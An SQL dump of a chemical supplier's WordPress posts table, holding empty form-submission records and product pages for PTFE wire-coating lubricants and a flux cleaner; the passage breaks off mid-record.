INSERT INTO `wp_posts` VALUES (3948, 0, '2017-04-02 16:28:54', '2017-04-02 16:28:54', '', '', '', 'publish', 'closed', 'closed', '', '3948', '', '', '2017-04-02 16:28:55', '2017-04-02 16:28:55', '', 0, 'https://www.miller-stephenson.com/nf_sub/3948/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3949, 0, '2017-04-02 18:51:12', '2017-04-02 18:51:12', '', '', '', 'publish', 'closed', 'closed', '', '3949', '', '', '2017-04-02 18:51:12', '2017-04-02 18:51:12', '', 0, 'https://www.miller-stephenson.com/nf_sub/3949/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3950, 0, '2017-04-02 19:02:24', '2017-04-02 19:02:24', '', '', '', 'publish', 'closed', 'closed', '', '3950', '', '', '2017-04-02 19:02:24', '2017-04-02 19:02:24', '', 0, 'https://www.miller-stephenson.com/nf_sub/3950/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3951, 0, '2017-04-03 13:27:56', '2017-04-03 13:27:56', '', '', '', 'publish', 'closed', 'closed', '', '3951', '', '', '2017-04-03 13:27:56', '2017-04-03 13:27:56', '', 0, 'https://www.miller-stephenson.com/nf_sub/3951/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3952, 0, '2017-04-03 15:03:37', '2017-04-03 15:03:37', '', '', '', 'publish', 'closed', 'closed', '', '3952', '', '', '2017-04-03 15:03:37', '2017-04-03 15:03:37', '', 0, 'https://www.miller-stephenson.com/nf_sub/3952/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3953, 0, '2017-04-03 15:47:25', '2017-04-03 15:47:25', '', '', '', 'publish', 'closed', 'closed', '', '3953', '', '', '2017-04-03 15:47:26', '2017-04-03 15:47:26', '', 0, 'https://www.miller-stephenson.com/nf_sub/3953/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3954, 0, '2017-04-03 15:53:45', '2017-04-03 15:53:45', '', '', '', 'publish', 'closed', 'closed', '', '3954', '', '', '2017-04-03 15:53:45', '2017-04-03 15:53:45', '', 0, 'https://www.miller-stephenson.com/nf_sub/3954/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3955, 0, '2017-04-03 16:02:10', '2017-04-03 16:02:10', '', '', '', 'publish', 'closed', 'closed', '', '3955', '', '', '2017-04-03 16:02:10', '2017-04-03 16:02:10', '', 0, 'https://www.miller-stephenson.com/nf_sub/3955/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3956, 0, '2017-04-03 16:52:08', '2017-04-03 16:52:08', '', '', '', 'publish', 'closed', 'closed', '', '3956', '', '', '2017-04-03 16:52:08', '2017-04-03 16:52:08', '', 0, 'https://www.miller-stephenson.com/nf_sub/3956/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3957, 0, '2017-04-03 17:50:15', '2017-04-03 17:50:15', '', '', '', 'publish', 'closed', 'closed', '', '3957', '', '', '2017-04-03 17:50:16', '2017-04-03 17:50:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/3957/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3958, 0, '2017-04-03 22:09:35', '2017-04-03 22:09:35', '', '', '', 'publish', 'closed', 'closed', '', '3958', '', '', '2017-04-03 22:09:35', '2017-04-03 22:09:35', '', 0, 'https://www.miller-stephenson.com/nf_sub/3958/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3959, 0, '2017-04-04 13:23:47', '2017-04-04 13:23:47', '', '', '', 'publish', 'closed', 'closed', '', '3959', '', '', '2017-04-04 13:23:47', '2017-04-04 13:23:47', '', 0, 'https://www.miller-stephenson.com/nf_sub/3959/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3960, 0, '2017-04-04 13:59:45', '2017-04-04 13:59:45', '', '', '', 'publish', 'closed', 'closed', '', '3960', '', '', '2017-04-04 13:59:45', '2017-04-04 13:59:45', '', 0, 'https://www.miller-stephenson.com/nf_sub/3960/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3961, 0, '2017-04-04 14:12:35', '2017-04-04 14:12:35', '', '', '', 'publish', 'closed', 'closed', '', '3961', '', '', '2017-04-04 14:12:35', '2017-04-04 14:12:35', '', 0, 'https://www.miller-stephenson.com/nf_sub/3961/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3962, 0, '2017-04-04 14:59:58', '2017-04-04 14:59:58', '', '', '', 'publish', 'closed', 'closed', '', '3962', '', '', '2017-04-04 14:59:58', '2017-04-04 14:59:58', '', 0, 'https://www.miller-stephenson.com/nf_sub/3962/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3963, 0, '2017-04-04 20:10:47', '2017-04-04 20:10:47', '', '', '', 'publish', 'closed', 'closed', '', '3963', '', '', '2017-04-04 20:10:47', '2017-04-04 20:10:47', '', 0, 'https://www.miller-stephenson.com/nf_sub/3963/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3964, 0, '2017-04-05 07:47:25', '2017-04-05 07:47:25', '', '', '', 'publish', 'closed', 'closed', '', '3964', '', '', '2017-04-05 07:47:25', '2017-04-05 07:47:25', '', 0, 'https://www.miller-stephenson.com/nf_sub/3964/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3965, 0, '2017-04-05 14:33:13', '2017-04-05 14:33:13', '', '', '', 'publish', 'closed', 'closed', '', '3965', '', '', '2017-04-05 14:33:13', '2017-04-05 14:33:13', '', 0, 'https://www.miller-stephenson.com/nf_sub/3965/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3966, 0, '2017-04-05 17:10:38', '2017-04-05 17:10:38', '', '', '', 'publish', 'closed', 'closed', '', '3966', '', '', '2017-04-05 17:10:38', '2017-04-05 17:10:38', '', 0, 'https://www.miller-stephenson.com/nf_sub/3966/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3967, 0, '2017-04-05 17:11:29', '2017-04-05 17:11:29', '', '', '', 'publish', 'closed', 'closed', '', '3967', '', '', '2017-04-05 17:11:29', '2017-04-05 17:11:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/3967/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3968, 0, '2017-04-05 17:33:18', '2017-04-05 17:33:18', '', '', '', 'publish', 'closed', 'closed', '', '3968', '', '', '2017-04-05 17:33:18', '2017-04-05 17:33:18', '', 0, 'https://www.miller-stephenson.com/nf_sub/3968/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3969, 0, '2017-04-05 17:50:48', '2017-04-05 17:50:48', '', '', '', 'publish', 'closed', 'closed', '', '3969', '', '', '2017-04-05 17:50:49', '2017-04-05 17:50:49', '', 0, 'https://www.miller-stephenson.com/nf_sub/3969/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3970, 0, '2017-04-05 18:54:25', '2017-04-05 18:54:25', '', '', '', 'publish', 'closed', 'closed', '', '3970', '', '', '2017-04-05 18:54:25', '2017-04-05 18:54:25', '', 0, 'https://www.miller-stephenson.com/nf_sub/3970/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3971, 0, '2017-04-05 19:09:34', '2017-04-05 19:09:34', '', '', '', 'publish', 'closed', 'closed', '', '3971', '', '', '2017-04-05 19:09:34', '2017-04-05 19:09:34', '', 0, 'https://www.miller-stephenson.com/nf_sub/3971/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3972, 0, '2017-04-05 20:53:04', '2017-04-05 20:53:04', '', '', '', 'publish', 'closed', 'closed', '', '3972', '', '', '2017-04-05 20:53:05', '2017-04-05 20:53:05', '', 0, 'https://www.miller-stephenson.com/nf_sub/3972/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3973, 0, '2017-04-05 22:35:53', '2017-04-05 22:35:53', '', '', '', 'publish', 'closed', 'closed', '', '3973', '', '', '2017-04-05 22:35:53', '2017-04-05 22:35:53', '', 0, 'https://www.miller-stephenson.com/nf_sub/3973/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3974, 0, '2017-04-06 07:32:26', '2017-04-06 07:32:26', '', '', '', 'publish', 'closed', 'closed', '', '3974', '', '', '2017-04-06 07:32:26', '2017-04-06 07:32:26', '', 0, 'https://www.miller-stephenson.com/nf_sub/3974/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3975, 0, '2017-04-06 08:50:41', '2017-04-06 08:50:41', '', '', '', 'publish', 'closed', 'closed', '', '3975', '', '', '2017-04-06 08:50:42', '2017-04-06 08:50:42', '', 0, 'https://www.miller-stephenson.com/nf_sub/3975/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3976, 630, '2017-04-06 13:26:50', '2017-04-06 13:26:50', '', '', '', 'publish', 'closed', 'closed', '', '3976', '', '', '2017-04-06 13:26:51', '2017-04-06 13:26:51', '', 0, 'https://www.miller-stephenson.com/nf_sub/3976/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3977, 0, '2017-04-06 17:46:32', '2017-04-06 17:46:32', '', '', '', 'publish', 'closed', 'closed', '', '3977', '', '', '2017-04-06 17:46:32', '2017-04-06 17:46:32', '', 0, 'https://www.miller-stephenson.com/nf_sub/3977/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3978, 0, '2017-04-06 19:14:09', '2017-04-06 19:14:09', '', '', '', 'publish', 'closed', 'closed', '', '3978', '', '', '2017-04-06 19:14:09', '2017-04-06 19:14:09', '', 0, 'https://www.miller-stephenson.com/nf_sub/3978/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3979, 634, '2017-04-06 19:14:15', '2017-04-06 19:14:15', '', '', '', 'publish', 'closed', 'closed', '', '3979', '', '', '2017-04-06 19:14:16', '2017-04-06 19:14:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/3979/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3980, 0, '2017-04-06 20:48:43', '2017-04-06 20:48:43', '', '', '', 'publish', 'closed', 'closed', '', '3980', '', '', '2017-04-06 20:48:43', '2017-04-06 20:48:43', '', 0, 'https://www.miller-stephenson.com/nf_sub/3980/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3981, 0, '2017-04-07 10:32:24', '2017-04-07 10:32:24', '', '', '', 'publish', 'closed', 'closed', '', '3981', '', '', '2017-04-07 10:32:24', '2017-04-07 10:32:24', '', 0, 'https://www.miller-stephenson.com/nf_sub/3981/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3982, 0, '2017-04-07 14:40:10', '2017-04-07 14:40:10', '', '', '', 'publish', 'closed', 'closed', '', '3982', '', '', '2017-04-07 14:40:10', '2017-04-07 14:40:10', '', 0, 'https://www.miller-stephenson.com/nf_sub/3982/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3984, 0, '2017-04-07 15:04:08', '2017-04-07 15:04:08', '', '', '', 'publish', 'closed', 'closed', '', '3984', '', '', '2017-04-07 15:04:08', '2017-04-07 15:04:08', '', 0, 'https://www.miller-stephenson.com/nf_sub/3984/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3985, 3, '2017-04-07 16:45:38', '2017-04-07 16:45:38', '<h2><strong>DryFilm Industrial Coating Introduction</strong></h2>\r\nShieldSys™ 815 Dryfilm Industrial Coating is a water-based, PTFE coating system providing unmatched utility as a wire and cable lubricant.  Our products generate a thin, dry, and lubricious film on metal wires, insulated wires, and twisted wire in jackets. Our proprietary chemistry yields superior surface adhesion and durability resulting in minimal migration of the lubricant and prolonged application effectiveness. The unique properties of ShieldSys™ 815 DryFilm industrial coating makes them ideal for application that require enhanced lubricity and antistick properties on conductor or insulated wire and cable. DryFilm lubrication products reduce insulation stripping force and provide nonstick abrasion resistance to twisted wire and lubricity for welding wire, wire forming, and knitting without the use of standard "wet lubricants" like greases and oils. Our patented <a href="https://en.wikipedia.org/wiki/Polytetrafluoroethylene">PTFE</a>-based formulation is thermally stable and can be used at temperatures up to 300°C (581°F). The polymer is clean non-migrating, chemically inert, and not gummy or oily. Moreover ShieldSys™ 815 can be used as an excellent electrical insulator coating.\r\n<h4><strong>Wire Drawing Lubrication Benefits: </strong></h4>\r\nShieldSys™ 815 DryFilm Industrial Coating are extremely stable dry lubrication products that form a film on the wire surface for drawing. The product can also be used as a pre-coat to enhance the total performance of your drawing lubrication products. One to two die-pass systems are recommended. As a Wire and Cable Lubricant, applicator will observe superior surface adhesion and a dramatic reduction in coefficient of friction.\r\n<h4><strong>Wire and Cable Coating and Stripping:</strong></h4>\r\nThe unique properties of our wire and cable lubrication products makes them ideal in coatings that enhance lubricity and antistick properties on conductor or insulated wire and cable. DryFilm lubrication products reduce insulation stripping force and provide nonstick abrasion resistance to twisted wire and lubricity for welding wire, wire forming, and knitting. ShieldSys™ 815 are used to impart a thin, nonstick film on metal wires or on insulated wire for cable products and twisted wire in jackets.', 'ShieldSys™ 815 DryFilm Industrial Coating', 'ShieldSys 815 Dryfilm Industrial Coating is a water-based, PTFE coating system providing unmatched utility as a wire and cable lubricant, coating and insulator. Our product generates a thin, dry, and lubricious film on metal wires, insulated wires, and twisted wire in jackets. ShieldSys 815 utilizes proprietary chemistry yielding superior surface adhesion and durability resulting in minimal migration of the lubricant and prolonged application effectiveness. Benefits include:\r\n<ul>\r\n 	<li>Water-based formulation</li>\r\n 	<li>Superior surface adhesion and durability</li>\r\n 	<li>Anti-stick; low coefficient of friction</li>\r\n 	<li>Low VOC; Low Odor</li>\r\n 	<li>Fast Dry and Cure Times</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'shieldsys-815-dryfilm-industrial-coating', '', '', '2017-05-01 16:57:23', '2017-05-01 16:57:23', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=3985', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (3986, 3, '2017-04-07 15:29:13', '2017-04-07 15:29:13', 'Wire and Cable lubricant', 'DryFilm Industrial Coating', 'Wire and Cable lubricant', 'inherit', 'closed', 'closed', '', 'shutterstock_355437692', '', '', '2017-04-07 16:46:14', '2017-04-07 16:46:14', '', 3985, 'https://www.miller-stephenson.com/wp-content/uploads/2017/04/shutterstock_355437692.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3987, 3, '2017-04-07 16:41:10', '2017-04-07 16:41:10', '', 'shieldsys-815', '', 'inherit', 'closed', 'closed', '', 'shieldsys-815', '', '', '2017-04-07 16:41:10', '2017-04-07 16:41:10', '', 3985, 'https://www.miller-stephenson.com/wp-content/uploads/2017/04/ShieldSys-815.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3988, 3, '2017-04-28 14:33:45', '2017-04-28 14:33:45', '<h2><strong>DryFilm Industrial Coating Introduction</strong></h2>\nShieldSys™ 815 Dryfilm Industrial Coating is a water-based, PTFE coating system providing unmatched utility as a wire and cable lubricant and .  Our products generate a thin, dry, and lubricious film on metal wires, insulated wires, and twisted wire in jackets. Our proprietary chemistry yields superior surface adhesion and durability resulting in minimal migration of the lubricant and prolonged application effectiveness. The unique properties of ShieldSys™ 815 DryFilm industrial coating makes them ideal for application that require enhanced lubricity and antistick properties on conductor or insulated wire and cable. DryFilm lubrication products reduce insulation stripping force and provide nonstick abrasion resistance to twisted wire and lubricity for welding wire, wire forming, and knitting without the use of standard "wet lubricants" like greases and oils. Our patented <a href="https://en.wikipedia.org/wiki/Polytetrafluoroethylene">PTFE</a>-based formulation is thermally stable and can be used at temperatures up to 300°C (581°F). The polymer is clean non-migrating, chemically inert, and not gummy or oily. Moreover ShieldSys™ 815 can be used as an excellent electrical insulator coating.\n<h4><strong>Wire Drawing Lubrication Benefits: </strong></h4>\nShieldSys™ 815 DryFilm Industrial Coating are extremely stable dry lubrication products that form a film on the wire surface for drawing. The product can also be used as a pre-coat to enhance the total performance of your drawing lubrication products. One to two die-pass systems are recommended. As a Wire and Cable Lubricant, applicator will observe superior surface adhesion and a dramatic reduction in coefficient of friction.\n<h4><strong>Wire and Cable Coating and Stripping:</strong></h4>\nThe unique properties of our wire and cable lubrication products makes them ideal in coatings that enhance lubricity and antistick properties on conductor or insulated wire and cable. DryFilm lubrication products reduce insulation stripping force and provide nonstick abrasion resistance to twisted wire and lubricity for welding wire, wire forming, and knitting. ShieldSys™ 815 are used to impart a thin, nonstick film on metal wires or on insulated wire for cable products and twisted wire in jackets.', 'ShieldSys™ 815 DryFilm Industrial Coating', 'ShieldSys 815 Dryfilm Industrial Coating is a water-based, PTFE coating system providing unmatched utility as a wire and cable lubricant, coating and insulator. Our product generates a thin, dry, and lubricious film on metal wires, insulated wires, and twisted wire in jackets. ShieldSys 815 utilizes proprietary chemistry yielding superior surface adhesion and durability resulting in minimal migration of the lubricant and prolonged application effectiveness. Benefits include:\n<ul>\n 	<li>Water-based formulation</li>\n 	<li>Superior surface adhesion and durability</li>\n 	<li>Anti-stick; low coefficient of friction</li>\n 	<li>Low VOC; Low Odor</li>\n 	<li>Fast Dry and Cure Times</li>\n</ul>', 'inherit', 'closed', 'closed', '', '3985-autosave-v1', '', '', '2017-04-28 14:33:45', '2017-04-28 14:33:45', '', 3985, 'https://www.miller-stephenson.com/3985-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3989, 3, '2017-04-07 18:39:30', '2017-04-07 18:39:30', '<h2>ShieldSys™ 520 Insulator &amp; Conductor Coating</h2>\r\n<h3>Advanced Coating Technology - Superior Lubricity, Coefficient of Friction, and Surface Adhesion</h3>\r\nShieldSys 520 Insulator &amp; Conductor Coating is a <a href="https://en.wikipedia.org/wiki/Polytetrafluoroethylene">PTFE</a> wire coating designed to provide unmatched lubricity and anti-stick properties to all wires and cables. ShieldSys 520 wire coating is water and isopropyl alcohol based dispersion.  When applied to to a wire or cable, it exhibits outstanding adhesion, durability, and a very low coefficient of friction. This coating is particular effectively at enabling easy jacket stripping due to its high lubricity and non-stick properties. ShieldSys 520 is proprietary PTFE wire coating formulation providing accelerated drying and cure times relative to ShieldSys 815. Moreover ShieldSys 520 can be used as a electrical conductor coating.\r\n<h4><strong>Advantages of Insulator &amp; Conductor Coating:</strong></h4>\r\nShieldSys 520 exhibit outstanding lubricity and extremely low coefficient of friction. The patented polymer is thermally stable and can be used at temperatures up to 300°C (572°F). The polymer is clean, non-migrating, chemically inert, and not gummy or oily.\r\n<h4><strong>Wire Drawing Lubricant:</strong></h4>\r\nShieldSys 520 PTFE wire coating is a high performance PTFE dispersions which extremely stable dry lubricants that form a film on the wire surface for drawing. The product can also be used as a pre-coat to enhance the total performance of your drawing lubricant systems. Die wear is minimized, and faster speeds can be obtained.\r\n<h4><strong>Coating and Wire Stripping:</strong></h4>\r\nDue to ShieldSys\' unique properties they are the ideal coatings for enhancing lubricity and antistick properties on conductor or insulated wire and cable. DryFilm dispersions are used to impart a thin nonstick film on metal wires as well as on insulated wire and cable products and twisted wire in jackets. Applications include: reduce insulation stripping force, provide nonstick (abrasion resistance) to twisted wire, and a lubricant for welding wire, wire forming, and knitting.\r\n<h4><strong>Processing Details:</strong></h4>\r\nThe application of ShieldSys DryFilm products fits easily into most wire production facilities. The wire can be run through a dispersion bath containing one our PTFE wire coatings. Alternately, conventional spraying equipment can be used to coat the wire. A heating or drying step is recommended to ensure the carrier has evaporated prior to insulation or spooling. Quick drying can be achieved by using the solvent-based products that use isopropyl alcohol.', 'ShieldSys™ 520 Insulator & Conductor Coating', 'ShieldSys 520 Conductor and Insulator Industrial Wire Coating is a Water/Alcohol PTFE coating system which provides accelerated drying and cure times while still exhibiting exceptional lubricity and wear resistance to all wire and cable surfaces. When applied to a substrate, it exhibits outstanding anti-stick properties and has a very low coefficient of friction. ShieldSys 520 develops a long lasting thin-film that is clean, non-oily, non-staining and chemically inert . Benefits of this product include:\r\n<ul>\r\n 	<li>High lubricity, Dryfilm coating</li>\r\n 	<li>Effective for Insulating &amp; Conducting uses</li>\r\n 	<li>Non-stick; low coefficient of friction</li>\r\n 	<li>Clean, Non-oily, Non-migrating</li>\r\n 	<li>Allows easy removal of outer jacket on wire</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'insulator-conductor-coating', '', '', '2017-06-26 15:40:07', '2017-06-26 15:40:07', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=3989', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (3990, 3, '2017-04-07 18:38:39', '2017-04-07 18:38:39', 'DryFilm Wire Coating', 'Insulator & Conductor Coating', 'ShieldSys 520', 'inherit', 'closed', 'closed', '', 'shutterstock_184233572', '', '', '2017-04-17 14:29:28', '2017-04-17 14:29:28', '', 3989, 'https://www.miller-stephenson.com/wp-content/uploads/2017/04/shutterstock_184233572.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3991, 3, '2017-06-26 13:24:58', '2017-06-26 13:24:58', '<h2>ShieldSys™ 520 Insulator &amp; Conductor Coating</h2>\n<h3>Advanced Coating Technology - Superior Lubricity, Coefficient of Friction, and Surface Adhesion</h3>\nShieldSys 520 Insulator &amp; Conductor Coating is a <a href="https://en.wikipedia.org/wiki/Polytetrafluoroethylene">PTFE</a> wire coating designed to provide unmatched lubricity and anti-stick properties to all wires and cables. ShieldSys 520 wire coating is water and isopropyl alcohol based dispersion.  When applied to to a wire or cable, it exhibits outstanding adhesion, durability, and a very low coefficient of friction. This coating is particular effectively at enabling easy jacket stripping due to its high lubricity and non-stick properties. ShieldSys 520 is proprietary PTFE wire coating formulation providing accelerated drying and cure times relative to ShieldSys 815. Moreover ShieldSys 520 can be used as a electrical conductor coating.\n<h4><strong>Advantages of Insulator &amp; Conductor Coating:</strong></h4>\nShieldSys 520 exhibit outstanding lubricity and extremely low coefficient of friction. The patented polymer is thermally stable and can be used at temperatures up to 300°C (572°F). The polymer is clean, non-migrating, chemically inert, and not gummy or oily.\n<h4><strong>Wire Drawing Lubricant:</strong></h4>\nShieldSys 520 PTFE wire coating is a high performance PTFE dispersions which extremely stable dry lubricants that form a film on the wire surface for drawing. The product can also be used as a pre-coat to enhance the total performance of your drawing lubricant systems. Die wear is minimized, and faster speeds can be obtained.\n<h4><strong>Coating and Wire Stripping:</strong></h4>\nDue to ShieldSys\' unique properties they are the ideal coatings for enhancing lubricity and antistick properties on conductor or insulated wire and cable. DryFilm dispersions are used to impart a thin nonstick film on metal wires as well as on insulated wire and cable products and twisted wire in jackets. Applications include: reduce insulation stripping force, provide nonstick (abrasion resistance) to twisted wire, and a lubricant for welding wire, wire forming, and knitting.\n<h4><strong>Processing Details:</strong></h4>\nThe application of ShieldSys DryFilm products fits easily into most wire production facilities. The wire can be run through a dispersion bath containing one our PTFE wire coatings. Alternately, conventional spraying equipment can be used to coat the wire. A heating or drying step is recommended to ensure the carrier has evaporated prior to insulation or spooling. Quick drying can be achieved by using the solvent-based products that use isopropyl alcohol.', 'ShieldSys™ 520 Insulator & Conductor Coating', 'ShieldSys 520 Conductor and Insulator Industrial Wire Coating is a Water/Alcohol PTFE coating system which provides accelerated drying and cure times while still exhibiting exceptional lubricity and wear resistance to all wire and cable surfaces. When applied to a substrate, it exhibits outstanding anti-stick properties and has a very low coefficient of friction. ShieldSys 520 develops a long lasting thin-film that is clean, non-oily, non-staining and chemically inert . Benefits of this product include:\n<ul>\n 	<li>High lubricity, Dryfilm coating</li>\n 	<li>Effective for Insulating &amp; Conducting uses</li>\n 	<li>Non-stick; low coefficient of friction</li>\n 	<li>Clean, Non-oily, Non-migrating</li>\n 	<li>Allows easy removal of outer jacket on wire</li>\n</ul>', 'inherit', 'closed', 'closed', '', '3989-autosave-v1', '', '', '2017-06-26 13:24:58', '2017-06-26 13:24:58', '', 3989, 'https://www.miller-stephenson.com/3989-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3992, 0, '2017-04-07 20:08:03', '2017-04-07 20:08:03', '', '', '', 'publish', 'closed', 'closed', '', '3992', '', '', '2017-04-07 20:08:03', '2017-04-07 20:08:03', '', 0, 'https://www.miller-stephenson.com/nf_sub/3992/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3993, 0, '2017-04-07 21:09:08', '2017-04-07 21:09:08', '', '', '', 'publish', 'closed', 'closed', '', '3993', '', '', '2017-04-07 21:09:08', '2017-04-07 21:09:08', '', 0, 'https://www.miller-stephenson.com/nf_sub/3993/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3994, 0, '2017-04-07 21:43:37', '2017-04-07 21:43:37', '', '', '', 'publish', 'closed', 'closed', '', '3994', '', '', '2017-04-07 21:43:38', '2017-04-07 21:43:38', '', 0, 'https://www.miller-stephenson.com/nf_sub/3994/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3995, 0, '2017-04-08 06:53:17', '2017-04-08 06:53:17', '', '', '', 'publish', 'closed', 'closed', '', '3995', '', '', '2017-04-08 06:53:17', '2017-04-08 06:53:17', '', 0, 'https://www.miller-stephenson.com/nf_sub/3995/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3996, 0, '2017-04-08 06:56:21', '2017-04-08 06:56:21', '', '', '', 'publish', 'closed', 'closed', '', '3996', '', '', '2017-04-08 06:56:21', '2017-04-08 06:56:21', '', 0, 'https://www.miller-stephenson.com/nf_sub/3996/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3997, 0, '2017-04-08 18:21:31', '2017-04-08 18:21:31', '', '', '', 'publish', 'closed', 'closed', '', '3997', '', '', '2017-04-08 18:21:31', '2017-04-08 18:21:31', '', 0, 'https://www.miller-stephenson.com/nf_sub/3997/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3998, 0, '2017-04-09 02:35:31', '2017-04-09 02:35:31', '', '', '', 'publish', 'closed', 'closed', '', '3998', '', '', '2017-04-09 02:35:31', '2017-04-09 02:35:31', '', 0, 'https://www.miller-stephenson.com/nf_sub/3998/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3999, 2, '2017-04-09 06:01:47', '2017-04-09 06:01:47', '<h3>Flux Cleaner | MS-560 &amp; MS-562</h3>\nOur best no-clean flux cleaner and heavy duty cleaner. It is nonflammable and suitable for removing no-clean flux as well as oil, ionic salts, and particulate matter. Ideal for field service, production, and prototype work. Evaporates quickly and leaves no residue.\n<h4><strong>Advantages of MS-560 &amp; MS-562 Flux Cleaner:</strong></h4>\n<ul>\n 	<li>Evaporates quickly</li>\n 	<li>Leaves no residue</li>\n 	<li>Nonflammable</li>\n 	<li>Non ozone depleting</li>\n 	<li><a href="http://www.rohsguide.com/">RoHS Compliant</a></li>\n</ul>\n<h4><strong>PROPERTIES OF SOLVENT FLUX CLEANER:</strong></h4>\nBoiling Point…………………………….…… 99°F/37°C\n\nFlash Point……………………………………….….None\n\nLiquid Density…………………..1.25 g/ml @ 77°F/25°C\n\nOzone Depletion…………………………….………..0.00\n\n<strong>PLASTIC COMPATIBILITY:</strong>\n\n(Immersion: 15 minutes at Room Temperature)\n<ul>\n 	<li>Acetal</li>\n 	<li>Polyethylene</li>\n 	<li>Polypropylene</li>\n 	<li>Liquid Crystal Polymer</li>\n 	<li>Polyester, PBT, PET</li>\n 	<li>Epoxy</li>\n 	<li>Polysulfone, PSO</li>\n 	<li>PEK, PEEK</li>\n 	<li>Polyimides</li>\n 	<li>PTFE</li>\n 	<li>Phenolic</li>\n 	<li>Polyvinylchloride</li>\n</ul>\nNOTE: Acrylic, ABS, and polycarbonate, if under stress, may show slight cracking or crazing damage. Test for compatibility before use.\n\n<strong>ELASTOMER COMPATIBILITY:</strong>\n\n(Immersion: 15 minutes at Room Temperature)\n<ul>\n 	<li>Butyl Rubber*</li>\n 	<li>Natural Rubber</li>\n 	<li>Polysulfide</li>\n 	<li>EPDM</li>\n 	<li>Buna S*</li>\n 	<li>Buna N</li>\n 	<li>Neoprene*</li>\n 	<li>Urethane</li>\n 	<li>Chlorosuflonated PE</li>\n 	<li>Silicone</li>\n 	<li>Fluoroelastomers</li>\n</ul>\n*Swelling, but with low extractables.\n\nElastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after air drying. Swell, shrinkage, and extractables are strongly affected by the compounding agents, plasticizers, and curing used in the manufacture of the elastomers. Test for compatibility before use.\n\n<strong>METAL COMPATIBILITY:</strong>\n\n(Immersion: 2 weeks at 248°F/120°C)\n<ul>\n 	<li>Aluminum</li>\n 	<li>Copper</li>\n 	<li>Iron</li>\n</ul>\nNote: Test for compatibility before use. This product is nonflammable, odorless, and has a low order of toxicity.\n\nSafety Data Sheets (SDS) are available upon request.\n\nFor technical support: 800-992-2424 (8-4 E.T.) in the U.S. 800-323-4621 (8-4 E.T.) in Canada.\n\nE-mail: support@mschem.com\n\n&nbsp;', 'MS-560 & MS-562 Flux Cleaner', '<strong>Removes no-clean flux as well as oil, ionic salts, and particulate matter.</strong>\n\nOur best no-clean flux remover and heavy duty cleaner. It is nonflammable and suitable for removing no-clean flux well as oil, ionic salts, and particulate matter. Ideal for field service, production, and prototype work. Evaporates quickly and leaves no residue.', 'inherit', 'closed', 'closed', '', '1695-autosave-v1', '', '', '2017-04-09 06:01:47', '2017-04-09 06:01:47', '', 1695, 